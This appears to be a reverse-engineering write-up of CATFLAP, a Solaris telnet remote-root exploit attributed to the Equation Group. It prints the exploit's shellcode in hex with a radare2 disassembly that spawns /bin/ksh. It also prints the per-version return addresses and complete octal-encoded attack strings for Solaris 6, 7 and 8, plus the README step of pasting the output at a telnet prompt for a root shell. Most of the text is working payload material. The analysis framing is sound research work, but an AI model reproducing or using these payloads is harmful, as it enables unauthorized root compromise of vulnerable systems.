CATFLAP

CATFLAP is a Solaris exploit with x86 and SPARC CPU architecture support. It is a exploit in telnet that gives you remote root access according to the README:

### paste catflap output once you get telnet prompt
<ctrl><d>

### should get root prompt

Catflap strings output:

catflap:
*******************************************************
Solaris/x86 port of Cat Flap Exploit
%s < -6 | -7 | -8 >
  -6            Configure for Solaris 2.6 target
  -7            Configure for Solaris 7 target
  -8            Configure for Solaris 8 target
*******************************************************

Usage: %s [-v] IP "command"

GCC: (GNU) 2.96 20000731 (Mandrake Linux 8.1 2.96-0.62mdk)

catflap_intel_v1:
usage: catflap <-8> -c cmd
  -8		Configure for Solaris 8 target
  -7		Configure for Solaris 7 target
  -c cmd	Specify command to run on target

GCC: (GNU) 2.96 20000731 (experimental)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)

catflap_intel_v2:
*******************************************************
Solaris/x86 port of Cat Flap Exploit
%s < -6 | -7 | -8 > 
  -6		Configure for Solaris 2.6 target
  -7		Configure for Solaris 7 target
  -8		Configure for Solaris 8 target
*******************************************************
GCC: (GNU) 2.96 20000731 (experimental)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)

catflap_sparc:
usage: catflap <-6 | -7 | -8 | -p | -9> -c cmd
  -6		Configure for Solaris 2.6 target (post patch 105665-02)
  -7		Configure for Solaris 7 target
  -8		Configure for Solaris 8 target (pre patch 111085-01)
  -p		Configure for Solaris 8 target (post patch 111085-01)
  -9		Configure for Solaris 9 target
  -c cmd	Specify command to run on target

GCC: (GNU) 2.96 20000731 (experimental)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)

If we reverse engineer the Intel v2 binary, we find the following shellcode:

33c0eb065f884706eb2de8f5ffffff9a7a514c1f2705c333d2588d7814525750ab92ab884208b03be8e2ffffff33c050b001e8d8ffffffe8dbffffff2f62696e2f6b7368

Disassembling in radare2:

[0x00000000]> pd
            0x00000000      33c0           xor eax, eax
        ,=< 0x00000002      eb06           jmp 0xa
        |   0x00000004      5f             pop edi
        |   0x00000005      884706         mov byte [edi + 6], al
       ,==< 0x00000008      eb2d           jmp 0x37
       |`-> 0x0000000a      e8f5ffffff     call 4
       |    0x0000000f      9a7a514c1f27.  lcall 0x27:0x1f4c517a
       |    0x00000016      c3             ret
       |    0x00000017      33d2           xor edx, edx
       |    0x00000019      58             pop eax
       |    0x0000001a      8d7814         lea edi, [eax + 0x14]       ; "'" ; 20
       |    0x0000001d      52             push edx
       |    0x0000001e      57             push edi
       |    0x0000001f      50             push eax
       |    0x00000020      ab             stosd dword es:[edi], eax
       |    0x00000021      92             xchg eax, edx
       |    0x00000022      ab             stosd dword es:[edi], eax
       |    0x00000023      884208         mov byte [edx + 8], al
       |    0x00000026      b03b           mov al, 0x3b                ; ';' ; 59
       |    0x00000028      e8e2ffffff     call 0xf
       |    0x0000002d      33c0           xor eax, eax
       |    0x0000002f      50             push eax
       |    0x00000030      b001           mov al, 1
       |    0x00000032      e8d8ffffff     call 0xf
       `--> 0x00000037      e8dbffffff     call 0x17
            0x0000003c      /bin/ksh
	    0x00000044

This code will put a nullbyte at 0x44 and after that call 0xf but I wasn’t able to figure out what that one would do or where it would jump to.

The hardcoded addresses in the beginning of the main function are probably locations in the telnet binary to jump to.

|           0x080486dc      c785a8d8ffff.  mov dword [local_2758h], 0x804fc6f ; version 6
|           0x080486e6      c785a4d8ffff.  mov dword [local_275ch], 0x804fcb7 ; version 7
|           0x080486f0      c785a0d8ffff.  mov dword [local_2760h], 0x8066b4f ; version 8

They are referenced and outputted in the final telnet exploit string (all bytes are encoded in octal numbers):

$ ./my_catflap -8
x x x x x x x x x x x x x x x x x x x x \
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=x\117\153\6\10\
xxx\144\153\6\10xxxx\144\153\6\10\
\63\300\353\6\137\210\107\6\353\55\350\365\377\377\377\232\172\121\114\37\47\5\303\63\322\130\215\170\24\122\127\120\253\222\253\210\102\10\260\73\350\342\377\377\377\63\300\120\260\1\350\330\377\377\377\350\333\377\377\377\57\142\151\156\57\153\163\150\
$ ./my_catflap -7
x x x x x x x x x x x x x x x x x x x x \
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=x\267\374\4\10\
xxx\304\374\4\10xxxx\304\374\4\10\
\63\300\353\6\137\210\107\6\353\55\350\365\377\377\377\232\172\121\114\37\47\5\303\63\322\130\215\170\24\122\127\120\253\222\253\210\102\10\260\73\350\342\377\377\377\63\300\120\260\1\350\330\377\377\377\350\333\377\377\377\57\142\151\156\57\153\163\150\
$ ./my_catflag -6
x x x x x x x x x x x x x x x x x x x x \
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx\
x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=xxxx x=x\157\374\4\10\
xxx\204\374\4\10xxxx\204\374\4\10\
\63\300\353\6\137\210\107\6\353\55\350\365\377\377\377\232\172\121\114\37\47\5\303\63\322\130\215\170\24\122\127\120\253\222\253\210\102\10\260\73\350\342\377\377\377\63\300\120\260\1\350\330\377\377\377\350\333\377\377\377\57\142\151\156\57\153\163\150\

stoicsurgeon

Equation Group Research

CATFLAP